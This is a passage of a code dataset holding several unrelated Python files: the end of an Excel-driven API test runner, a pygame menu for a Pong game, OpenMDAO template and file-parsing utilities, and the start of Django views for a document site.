\"Fail\"\n sheet[\"M%d\" % i] = response.content.decode(\"utf-8\")\n logging.error(case + \" \" + sheet[\"A%d\" % i].value + response.content.decode(\"utf-8\"))\n\n i += 1\n except Exception as e:\n logging.error(case + \" \" + sheet[\"A%d\" % i].value + \"Error: \" + str(e))\n i += 1\n continue\n\n sheet[\"M2\"].value = checked_version\n logging.info(\"The new version is updated. \")\n logging.info(\"the %s test is completed. \" % case)\n logging.info(\"------------------------------------------------------------------------------------\\n\\n\")\n # 每个版本的测试数据追加到最后一行,功能尚未完成\n # history_data_append(wb)\n wb.save(\"./testcase/\" + case)\n # 要求测试用例文档格式为XXX项目接口(或API)测试用例.xlsx\n # wb.save(\"./report/%s测试报告%s.html\" % (case[:-10], date.today()))\n # subprocess.call(\"cp /opt/auto_run/testcase/%s /home/xjin/.jenkins/workspace/API_Test/\" % case,\n # shell=True)\n with open(\"./report/%s测试报告%s.html\" % (case[:-10], date.today()), 'w') as html_file:\n html_file.write(to_html.HTML_TMPL)\n html_file.flush()\n html_file.close()\n else:\n logging.info(\"%s No new version found. \" % case)\n logging.info(\"------------------------------------------------------------------------------------\\n\\n\")\n except Exception as e:\n raise e\n\n\nif __name__ == '__main__':\n api_test()\n # history_data_append()\n # check_version(response=requests.get(\"http://10.215.137.232:8001/main/api/backend/version/\"))\n","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"599677598","text":"from math import *\r\nfrom pygame import *\r\nfrom Classique import *\r\nimport pygame\r\n\r\n#Background - Load - Initialisation des fonds.\r\n\r\ninit()\r\n\r\nfenetre = display.set_mode((800, 600), RESIZABLE)\r\n\r\nfondBlack = image.load(\"fonds/fondblack.jpg\").convert_alpha()\r\nfondMenu = image.load(\"fonds/fondmenu.jpg\").convert_alpha()\r\nfondModes = image.load(\"fonds/fondmodes.jpg\").convert_alpha()\r\n\r\n#Global Functions - Fonctions globales.\r\n\r\ndef clearAll():\r\n\t\"\"\"\r\n\tFonctions de déboggage, permet d'afficher un écran noir, utile pour savoir si il y a eu réponse ou non.\r\n\tDebugging function, displays a black screen. Can be used to detect user interaction in debug mode.\r\n\t\"\"\"\r\n\tfenetre.blit(fondBlack, (0,0))\r\n\tdisplay.flip()\r\n\r\n#States - États.\r\n\r\nstate = \"menu\"\r\nstateOverride = \"debug\" #Seulement à des fins de déboggage. Only for debugging purposes.\r\n\r\n\"\"\" \r\nAll different states - Tous les états différents :\r\n- \"menu\"\r\n- \"modes\"\r\n- \"informations\"\r\n- \"classique\"\r\n- \"pouvoirs\"\r\n- stateOverride ----> \"debug\".\r\n\"\"\"\r\nclass volume:\r\n\r\n\tdef displayFunc():\r\n\t\t\"\"\"\r\n\t\tAffiche et lance les fonctions liées le bouton mute du jeu.\r\n\t\tLoads and displays functions linked to the mute button.\r\n\t\t\"\"\"\r\n\t\t#Display - Affichage\r\n\r\n\t\tvolumeRect = image.load(\"mute.png\").convert_alpha()\r\n\t\tfenetre.blit(volumeRect, (0, 0))\r\n\tdef musicFunc():\r\n\t\t\"\"\"\r\n\t\tActive ou désactive toutes les fonctions liées au volume et aux sons du jeu.\r\n\t\tMute on or off.\r\n\t\t\"\"\"\r\n\t\tmusique_theme = pygame.mixer.music.load(\"musique.mp3\")\r\n\t\tpygame.mixer.music.play(-1)\r\n\r\n\tdef clickFunc():\r\n\t\t\"\"\"\r\n\t\tJoue le son lors d'un click.\r\n\t\tPlays a sound effect when object is clicked.\r\n\t\t\"\"\"\r\n\t\tclick_sound_effect = pygame.mixer.music.load(\"click.mp3\")\r\n\t\tpygame.mixer.music.play(0)\r\n\r\n\r\ndef menuFunc():\r\n\t\"\"\"\r\n\tLance l'apparation et les fonctions globales du Menu.\r\n\tRun dislay and load mouse events.\r\n\t\"\"\"\r\n\t#Display - Affichage.\r\n\tfenetre.blit(fondMenu, (0,0))\r\n\r\n\tpresentationRect = image.load(\"menu/presentation.jpg\").convert_alpha()\r\n\tfenetre.blit(presentationRect, (200, 250))\r\n\tmodesRect = image.load(\"menu/modes.jpg\").convert_alpha()\r\n\tfenetre.blit(modesRect, (300, 50))\r\n\tinformationsRect = image.load(\"menu/informations.jpg\").convert_alpha()\r\n\tfenetre.blit(informationsRect, (300, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 300 <= mouseCordsX <= 500:\r\n\t\t\tif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click informations | ! |\")\r\n\t\t\t\tstateTransfer = \"informations\"\r\n\t\t\t\treturn stateTransfer\r\n\t\t\telif 50 <= mouseCordsY <= 150:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click modes | ! |\")\r\n\t\t\t\tstateTransfer = \"modes\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\ndef modesFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions du menu de sélection des modes.\r\n\tRun display and load mouse events of the Modes menu.\r\n\t\"\"\"\r\n\t#Display - Affichage\r\n\tfenetre.blit(fondModes, (0,0))\r\n\r\n\ttitleRect = image.load(\"modes/titre.jpg\").convert_alpha()\r\n\tfenetre.blit(titleRect, (250, 20))\r\n\tclassiqueRect = image.load(\"modes/classique.jpg\").convert_alpha()\r\n\tfenetre.blit(classiqueRect, (250, 150))\r\n\tpouvoirsRect = image.load(\"modes/pouvoirs.jpg\").convert_alpha()\r\n\tfenetre.blit(pouvoirsRect, (345, 300))\r\n\tretourRect = image.load(\"modes/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (250, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 345 <= mouseCordsX <= 545:\r\n\t\t\tif 300 <= mouseCordsY <= 400:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click pouvoirs | ! |\")\r\n\t\t\t\tstateTransfer = \"debug\"\r\n\t\tif 250 <= mouseCordsX <= 450:\r\n\t\t\tif 150 <= mouseCordsY <= 250:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click classique | ! |\")\r\n\t\t\t\tstateTransfer = \"classique\"\r\n\t\t\t\treturn stateTransfer\r\n\t\t\telif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\ndef nbplayersFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions de la page de choix de joueurs.\r\n\tRun display and loads functions related to the players number.\r\n\t\"\"\"\r\n\t#Display - Affichage\r\n\tfenetre.blit(fondModes, (0,0))\r\n\r\n\tuniqueRect = image.load(\"players/unique.jpg\").convert_alpha()\r\n\tfenetre.blit(uniqueRect, (270, 45))\r\n\tduoRect = image.load(\"players/duo.jpg\").convert_alpha()\r\n\tfenetre.blit(duoRect, (385, 250))\r\n\tretourRect = image.load(\"modes/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (250, 450))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 270 <= mouseCordsX <= 470:\r\n\t\t\tif 45 <= mouseCordsY <= 145:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click unique | ! |\")\r\n\t\t\t\tstateTransfer = \"unique\"\r\n\t\t\t\treturn stateTransfer\r\n\t\tif 385 <= mouseCordsX <= 585:\r\n\t\t\tif 250 <= mouseCordsY <= 350:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click duo | ! |\")\r\n\t\t\t\tstateOverride = \"duo\"\r\n\t\t\t\treturn stateOverride\r\n\t\tif 250 <= mouseCordsX <= 450:\r\n\t\t\tif 450 <= mouseCordsY <= 550:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\t\r\n\tdisplay.flip()\r\n\r\ndef informationsFunc():\r\n\t\"\"\"\r\n\tLance l'apparition et les fonctions de la page informations.\r\n\tRun display and loads informations's mouse events.\r\n\t\"\"\" \r\n\t#Display - Affichage\r\n\tfenetre.blit(fondBlack, (0,0))\r\n\r\n\tpresentationRect = image.load(\"informations/texte.jpg\").convert_alpha()\r\n\tfenetre.blit(presentationRect,(0,0))\r\n\ttitleRect = image.load(\"informations/titre.jpg\").convert_alpha()\r\n\tfenetre.blit(titleRect, (250,25))\r\n\tretourRect = image.load(\"informations/retour.jpg\").convert_alpha()\r\n\tfenetre.blit(retourRect, (570, 475))\r\n\r\n\t#User mouse events - Utilisation de la souris par l'utilisateur. -- onClickEvent.\r\n\tmouseCordsX, mouseCordsY = mouse.get_pos()\r\n\tif mouse.get_pressed()[0]:\r\n\t\tif 570 < mouseCordsX < 770:\r\n\t\t\tif 475 < mouseCordsY < 575:\r\n\t\t\t\tvolume.clickFunc()\r\n\t\t\t\tprint(\"Click Retour | ! |\")\r\n\t\t\t\tstateTransfer = \"retour\"\r\n\t\t\t\treturn stateTransfer\r\n\r\n\tdisplay.flip()\r\n\r\n#Principal Loop - Boucle Principale.\r\n\r\nrunning = True\r\nmusique = True\r\n\r\nwhile running:\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n\t\t\tprint(\"Merci d'avoir jouer ! Voici une blague : Que dit Higgs lors d'un concert ? Quel Boson !\")\r\n\t\t\tquit()\r\n\t\t\texit()\r\n\r\n\t\tif state == \"menu\":\r\n\t\t\tmenuFunc()\r\n\t\t\tif menuFunc() == \"modes\":\r\n\t\t\t\tstate = \"modes\"\r\n\t\t\tif menuFunc() == \"informations\":\r\n\t\t\t\tstate = \"informations\"\r\n\r\n\t\tif state == \"modes\":\r\n\t\t\tmodesFunc()\r\n\t\t\tif modesFunc() == \"classique\":\r\n\t\t\t\tstate = \"classique\"\r\n\t\t\t\tif state == \"classique\":\r\n\t\t\t\t\tstate = \"players\"\r\n\t\t\telif modesFunc() == \"pouvoirs\":\r\n\t\t\t\tstate = \"pouvoirs\"\r\n\t\t\t\tif state == \"pouvoirs\":\r\n\t\t\t\t\tstate == \"players\"\r\n\t\t\telif modesFunc() == \"retour\":\r\n\t\t\t\tstate = \"retour\"\r\n\t\t\t\tif state == \"retour\":\r\n\t\t\t\t\tstate = \"menu\"\r\n\r\n\t\tif state == \"informations\":\r\n\t\t\tinformationsFunc()\r\n\t\t\tif informationsFunc() == \"retour\":\r\n\t\t\t\tstate = \"retour\"\r\n\t\t\t\tif state == \"retour\":\r\n\t\t\t\t\tstate = \"menu\"\r\n\r\n\t\tif state == \"players\":\r\n\t\t\tnbplayersFunc()\r\n\t\t\tif nbplayersFunc() == \"unique\":\r\n\t\t\t\tstate = \"start_unique\"\r\n\t\t\t\tif state == \"start_unique\":\r\n\t\t\t\t\tunique()\r\n\t\t\tif nbplayersFunc() == \"duo\":\r\n\t\t\t\tstate = \"start_duo\"\r\n\t\t\t\tif state == \"start_duo\":\r\n\t\t\t\t\tduo()\r\n\t\t\telif nbplayersFunc() == \"retour\":\r\n\t\t\t\tstate = \"menu\"","sub_path":"Pong/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523195190","text":"\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This is a work in progress.\n\"\"\"\n\nimport re\nfrom pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, \\\n ParserElement\n\n# pylint: disable-msg=E0611,F0401\nfrom numpy import append, array, zeros\n\ndef _getformat(val):\n # Returns the output format for a floating point number.\n # The general format is used with 16 places of accuracy, except for when\n # the floating point value is an integer, in which case a decimal point\n # followed by a single zero is used.\n \n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"Replaces file text at the correct word location in a line. This\n class contains the Helper Function that is passed to re.sub, etc.\"\"\"\n \n def __init__(self):\n \n self.newtext = \"\"\n self.replace_location = 0\n self.current_location = 0\n self.counter = 0\n self.start_location = 0\n self.end_location = 0\n \n def set(self, newtext, location):\n \"\"\"Sets a new word location and value for replacement.\"\"\"\n \n self.newtext = newtext\n self.replace_location = location\n self.current_location = 0\n \n def set_array(self, newtext, start_location, end_location):\n \"\"\"For an array, sets a new starting location, ending location, and\n value for replacement.\"\"\"\n \n self.newtext = newtext\n self.start_location = start_location\n self.end_location = end_location\n self.current_location = 0\n \n def replace(self, text):\n \"\"\"This function should be passed to re.sub.\n Outputs newtext if current_location = replace_location\n Otherwise, outputs the input text.\"\"\"\n \n self.current_location += 1\n \n if self.current_location == self.replace_location:\n if isinstance(self.newtext, float):\n return _getformat(self.newtext) % self.newtext\n else:\n return str(self.newtext)\n else:\n return text.group()\n \n def replace_array(self, text):\n \"\"\"This function should be passed to re.sub.\n Outputs newtext if current_location = replace_location\n Otherwise, outputs the input text.\"\"\"\n \n self.current_location += 1\n end = len(self.newtext)\n \n if self.current_location >= self.start_location and \\\n self.current_location <= self.end_location and \\\n self.counter < end:\n if isinstance(self.newtext[self.counter], float):\n val = self.newtext[self.counter]\n newval = _getformat(val) % val\n else:\n newval = str(self.newtext[self.counter])\n self.counter += 1\n return newval\n else:\n return text.group()\n\n\nclass ToInteger(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into an int.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into an integer.\"\"\"\n return int(tokenlist[0])\n\nclass ToFloat(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into a float.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into a float.\"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\nclass ToNan(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into Python nan.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into Python nan.\"\"\"\n return float('nan')\n \nclass ToInf(TokenConverter):\n \"\"\"Converter for PyParsing that is used to turn a token into Python inf.\"\"\"\n def postParse( self, instring, loc, tokenlist ):\n \"\"\"Converter to make token into Python inf.\"\"\"\n return float('inf')\n \n \ndef _parse_line():\n \"\"\"Parse a single data line that may contain string or numerical data.\n Float and Int 'words' are converted to their appropriate type. \n Exponentiation is supported, as are NaN and Inf.\"\"\"\n \n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = ToInteger(Combine( Optional(sign) + digits ))\n \n num_float = ToFloat(Combine( Optional(sign) + \n ((digits + dot + Optional(digits)) |\n (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n \n # special case for a float written like \"3e5\"\n mixed_exp = ToFloat(Combine( digits + ee + Optional(sign) + digits ))\n \n nan = ToInf(oneOf(\"Inf -Inf\")) | \\\n ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN \" + \\\n \"1.#SNAN 1.#QNAN -1.#IND\"))\n \n # sep = Literal(\" \") | Literal(\"\\n\")\n \n data = ( OneOrMore( (nan | num_float | mixed_exp | num_int |\n Word(printables)) ) )\n \n return data\n\n\nclass InputFileGenerator(object):\n \"\"\"Utility to generate an input file from a template.\n Substitution of values is supported. Data is located with\n a simple API.\"\"\"\n \n def __init__(self):\n \n self.template_filename = []\n self.output_filename = []\n \n self.delimiter = \" \"\n self.reg = re.compile('[^ \\n]+')\n \n self.data = []\n self.current_row = 0\n self.anchored = False\n \n def set_template_file(self, filename):\n \"\"\"Set the name of the template file to be used The template\n file is also read into memory when this method is called.\n \n filename: str\n Name of the template file to be used.\"\"\"\n \n self.template_filename = filename\n \n templatefile = open(filename, 'r')\n self.data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"Set the name of the file that will be generated.\n \n filename: str\n Name of the input file to be generated.\"\"\"\n \n self.output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"Lets you change the delimiter that is used to identify field\n boundaries.\n \n delimiter: str\n A string containing characters to be used as delimiters.\"\"\"\n \n self.delimiter = delimiter\n self.reg = re.compile('[^' + delimiter + '\\n]+')\n \n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"Marks the location of a landmark, which lets you describe data by\n relative position. Note that a forward search begins at the old anchor \n location. If you want to restart the search for the anchor at the file\n beginning, then call ``reset_anchor()`` before ``mark_anchor``. \n \n anchor: str\n The text you want to search for.\n \n occurrence: integer\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\"\"\"\n \n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n \n instance = 0\n if occurrence > 0:\n count = 0\n for line in self.data[self.current_row:]:\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self.anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n \n instance += 1\n if instance == occurrence:\n self.current_row += count\n self.anchored = True\n return\n \n count += 1\n \n elif occurrence < 0:\n count = len(self.data)-1\n for line in reversed(self.data):\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == len(self.data)-1 and self.anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self.current_row = count\n self.anchored = True\n return\n \n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n \n raise RuntimeError(\"Could not find pattern %s in template file %s\" % \\\n (anchor, self.template_filename))\n \n def reset_anchor(self):\n \"\"\"Resets anchor to the beginning of the file.\"\"\"\n \n self.current_row = 0\n self.anchored = False\n \n def transfer_var(self, value, row, field):\n \"\"\"Changes a single variable in the template relative to the \n current anchor.\n \n row - number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field - which word in line to replace, as denoted by delimiter(s)\"\"\"\n\n j = self.current_row + row\n line = self.data[j]\n \n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self.reg, sub.replace, line)\n \n self.data[j] = newline\n \n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"Changes the values of an array in the template relative to the \n current anchor. This should generally be used for one-dimensional\n or free form arrays.\n \n value: float, integer, bool, str\n array of values to insert.\n \n row_start: integer\n starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n \n field_start: integer\n starting field in the given row_start as denoted by \n delimiter(s). \n \n field_end: integer\n the final field the array uses in row_end. \n We need this to figure out if the template is too small or large\n \n row_end: integer (optional)\n Use if the array wraps to cover additional lines.\n \n sep: integer (optional)\n Separator to use if we go beyond the template.\"\"\"\n \n # Simplified input for single-line arrays\n if row_end == None:\n row_end = row_start\n \n sub = _SubHelper()\n for row in range(row_start, row_end+1):\n \n j = self.current_row + row\n line = self.data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n sub.set_array(value, field_start, f_end)\n field_start = 0\n \n newline = re.sub(self.reg, sub.replace_array, line)\n self.data[j] = newline\n \n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub.counter < len(value):\n for val in value[sub.counter:]:\n newline = newline.rstrip() + sep + str(val)\n \n self.data[j] = newline\n \n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub.counter > len(value):\n \n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n \n self.data[j] += \"\\n\"\n \n def transfer_2Darray(self, value, row_start, row_end, field_start,\n field_end, sep=\", \"):\n \"\"\"Changes the values of a 2D array in the template relative to the \n current anchor. This method is specialized for 2D arrays, where each\n row of the array is on its own line.\n \n value: ndarray\n array of values to insert.\n \n row_start: integer\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n \n row_end: integer\n Final row for the array, relative to the anchor.\n \n field_start: integer\n starting field in the given row_start as denoted by \n delimiter(s). \n \n field_end: integer\n the final field the array uses in row_end. \n We need this to figure out if the template is too small or large\n \n sep: str (optional) (currently unsupported)\n Separator to append between values if we go beyond the template\"\"\"\n\n sub = _SubHelper()\n i = 0\n for row in range(row_start, row_end+1):\n \n j = self.current_row + row\n line = self.data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n \n newline = re.sub(self.reg, sub.replace_array, line)\n self.data[j] = newline\n \n sub.current_location = 0\n sub.counter = 0\n i += 1\n \n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"Replace the contents of a row with the newline character.\n \n row: integer\n row number to clear, relative to current anchor.\"\"\"\n\n self.data[self.current_row + row] = \"\\n\"\n \n def generate(self):\n \"\"\"Use the template file to generate the input file.\"\"\"\n\n infile = open(self.output_filename, 'w')\n infile.writelines(self.data)\n infile.close()\n\n\nclass FileParser(object):\n \"\"\"Utility to locate and read data from a file.\"\"\"\n \n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \n self.filename = []\n self.data = []\n \n self.delimiter = \" \\t\"\n self.end_of_line_comment_char = end_of_line_comment_char\n self.full_line_comment_char = full_line_comment_char\n \n self.current_row = 0\n self.anchored = False\n \n def set_file(self, filename):\n \"\"\"Set the name of the file that will be generated.\n \n filename: str\n Name of the input file to be generated.\"\"\"\n \n self.filename = filename\n \n inputfile = open(filename, 'r')\n if not self.end_of_line_comment_char and not self.full_line_comment_char:\n self.data = inputfile.readlines()\n else:\n self.data = []\n for line in inputfile :\n if line[0] == self.full_line_comment_char : continue\n self.data.append( line.split( self.end_of_line_comment_char )[0] )\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n \"\"\"Lets you change the delimiter that is used to identify field\n boundaries.\n \n delimiter: str\n A string containing characters to be used as delimiters. The\n default value is ' \\t'. which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\"\"\"\n \n self.delimiter = delimiter\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n \n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"Marks the location of a landmark, which lets you describe data by\n relative position. Note that a forward search begins at the old anchor \n location. If you want to restart the search for the anchor at the file\n beginning, then call ``reset_anchor()`` before ``mark_anchor``. \n \n anchor: str\n The text you want to search for.\n \n occurrence: integer\n find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\"\"\"\n \n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n \n instance = 0\n if occurrence > 0:\n count = 0\n for line in self.data[self.current_row:]:\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self.anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n \n instance += 1\n if instance == occurrence:\n self.current_row += count\n self.anchored = True\n return\n \n count += 1\n \n elif occurrence < 0:\n count = len(self.data)-1\n for line in reversed(self.data):\n \n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == len(self.data)-1 and self.anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self.current_row = count\n self.anchored = True\n return\n \n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n \n raise RuntimeError(\"Could not find pattern %s in output file %s\" % \\\n (anchor, self.filename))\n \n def reset_anchor(self):\n \"\"\"Resets anchor to the beginning of the file.\"\"\"\n \n self.current_row = 0\n self.anchored = False\n \n def transfer_line(self, row):\n \"\"\"Returns a whole line, relative to current anchor.\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\"\"\"\n \n return self.data[self.current_row + row].rstrip()\n \n def transfer_var(self, row, field, fieldend=None):\n \"\"\"Grabs a single variable relative to the current anchor.\n \n --- If the delimiter is a set of chars (e.g., \", \") ---\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field: integer\n which word in line to retrieve.\n \n fieldend - IGNORED\n \n --- If the delimiter is \"columns\" ---\n \n row: integer\n number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n \n field: integer\n character position to start\n \n fieldend: integer (optional)\n position of last character to return. If omitted, the end of\n the line is used\"\"\"\n \n j = self.current_row + row\n line = self.data[j]\n \n if self.delimiter == \"columns\":\n \n if not fieldend:\n line = line[(field-1):]\n else:\n line = line[(field-1):(fieldend)]\n \n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = _parse_line().parseString(line)\n \n # data might have been split if it contains whitespace. If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = _parse_line().parseString(line)\n return data[field-1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"Searches for a key relative to the current anchor and then grabs\n a field from that line.\n \n field: integer\n Which field to transfer. Field 0 is the key.\n \n occurrence: integer\n find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n \n rowoffset: integer (optional)\n Optional row offset from the occurrence of key. This can\n also be negative.\n \n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\"\"\"\n\n if not isinstance(occurrence, int) or occurrence==0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n \n instance = 0\n if occurrence > 0:\n row = 0\n for line in self.data[self.current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n \n row += 1\n \n elif occurrence < 0:\n row = -1\n for line in reversed(self.data[self.current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n \n row -= 1\n \n j = self.current_row + row + rowoffset\n line = self.data[j]\n \n fields = _parse_line().parseString(line.replace(key,\"Key_Field\"))\n \n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"Grabs an array of variables relative to the current anchor.\n \n rowstart: integer\n Row number to start, relative to the current anchor\n \n fieldstart: integer\n field number to start\n \n rowend: integer (optional)\n row number to end. If not set, then only one row is grabbed.\n \n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the paramters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n \"\"\"\n \n j1 = self.current_row + rowstart\n \n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self.current_row + rowend + 1\n \n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n \n lines = self.data[j1:j2]\n\n data = zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self.delimiter == \"columns\":\n line = line[(fieldstart-1):fieldend]\n \n # Stripping whitespace may be controversial.\n line = line.strip()\n \n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = _parse_line().parseString(line)\n \n newdata = array(parsed[:])\n # data might have been split if it contains whitespace. If the\n # data is string, we probably didn't want this.\n if '|S' in str(newdata.dtype):\n newdata = array(line)\n \n data = append(data, newdata)\n \n else:\n parsed = _parse_line().parseString(line)\n if i == j2-j1-1:\n data = append(data, array(parsed[(fieldstart-1):fieldend]))\n else:\n data = append(data, array(parsed[(fieldstart-1):]))\n fieldstart = 1\n \n return data\n \n \n","sub_path":"openmdao.util/src/openmdao/util/filewrap.py","file_name":"filewrap.py","file_ext":"py","file_size_in_byte":25195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"40223931","text":"from django.core import serializers\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom coookit.models import (Documents,\n Comments)\nfrom coookit.forms import UserCommentsForm\n\n\ndef _topics_with_documents():\n return Documents.objects.visible().order_by('topic').values_list('topic', flat=True).distinct()\n\n\ndef home(request):\n docs_on_page = 8\n init_page_num = 1\n\n section = request.GET.get('section')\n page_number = request.GET.get('page', init_page_num)\n topics = _topics_with_documents()\n\n aggr = {}\n documents = Documents.objects.visible().order_by('topic')\n for one_doc in documents:\n aggr.setdefault(one_doc.topic, [])\n aggr[one_doc.topic].append(one_doc)\n\n for topic, docs in aggr.items():\n paginator = Paginator(docs, docs_on_page)\n if topic == section:\n page = paginator.get_page(page_number)\n else:\n page = paginator.get_page(init_page_num)\n aggr[topic] = page\n return render(request, \"index.html\", {'documents': aggr, 'topics': topics})\n\n\ndef document_read(request, doc_id):\n topics = _topics_with_documents()\n document = get_object_or_404(Documents, id=doc_id)\n return render(request, \"document.html\", {'document': document, 'topics': topics})\n\n\n@csrf_exempt\ndef user_comments(request, 